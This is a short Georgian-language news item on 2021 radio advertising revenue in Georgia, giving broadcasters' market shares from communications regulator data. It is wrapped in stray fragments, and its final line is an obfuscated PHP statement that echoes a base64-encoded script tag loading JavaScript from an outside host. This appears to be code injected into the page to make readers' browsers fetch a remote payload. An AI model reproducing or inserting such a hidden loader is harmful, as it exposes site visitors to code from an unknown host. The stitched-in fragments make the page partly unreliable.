gorgia
ავერსი jaluzi
2021 წელს რადიო მაუწყებლების მთლიანი სარეკლამო შემოსავლები 0.4 მილიონი ლარით გაიზარდა და 7.2 მილიონი ლარი შეადგინა.
 
კომუნიკაციების კომისიის ინფორმაციით, რადიო მაუწყებლობიდან მიღებული სარეკლამო შემოსავლების მიხედვით, ყველაზე დიდი წილი - 53.7% „რადიო ჰოლდინგ ფორტუნას“ ჰქონდა. დანარჩენი კი ასე  გადანაწილდა : 
 
„რადიო იმედი“ – 9.8%;
„ქართულ რადიო“ - 5.4%;
„რადიო პალიტრა“ - 5.2%;
„რადიო ჯორჯიან თაიმს“ 3.9%;
„მდ ჯგუფი“ - 3.4%;
„ჩვენ რადიო“ - 3% ;
„მედია ჰოლდინგ აფხაზეთის ხმა“ - 2.7%;
„მედიასტრიმი“ - 2.6% ;
„ჰერეთი“ - 1.5% ;
სხვა რადიო მაუწყებლების სარეკლამო შემოსავლების ჯამურმა წილმა კი 8.3% შეადგინა.
853
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");